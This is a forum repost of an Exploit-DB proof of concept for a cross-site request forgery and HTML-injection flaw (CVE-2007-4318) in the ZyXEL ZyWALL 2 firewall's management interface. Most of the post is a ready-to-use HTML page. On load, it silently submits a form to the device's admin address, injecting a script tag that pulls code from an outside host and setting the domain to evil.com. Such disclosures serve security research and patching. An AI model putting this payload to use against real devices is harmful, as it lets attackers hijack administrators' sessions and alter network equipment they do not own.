Exploit ZYXEL ZyWALL 2 3.62 - '/Forms/General_1?sysSystemName' Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
30485
Проверка EDB
  1. Пройдено
Автор
HENRI LINDBERG
Тип уязвимости
REMOTE
Платформа
HARDWARE
CVE
cve-2007-4318
Дата публикации
2007-08-10
HTML:
source: https://www.securityfocus.com/bid/25262/info

ZyXEL ZyWALL 2 is prone to multiple remote vulnerabilities that affect the management interface.

An attacker can exploit these issues to carry out cross-site request forgery, HTML-injection, and denial-of-service attacks.

ZyWALL 2 running with firmware V3.62(WK.6) is reported vulnerable to this issue. 

 <html>
  <body onload="document.CSRF.submit()">
  <FORM name="CSRF" METHOD="POST"
ACTION="http://192.168.1.1/Forms/General_1">
  <INPUT NAME="sysSystemName" VALUE="<script src='http://nx.fi/X'>"
  <INPUT NAME="sysDomainName" VALUE="evil.com">
  <INPUT NAME="StdioTimout" VALUE="0">
  <INPUT NAME="sysSubmit" VALUE="Apply">
  </form>
  </body>
  </html>
 
Источник
www.exploit-db.com

Похожие темы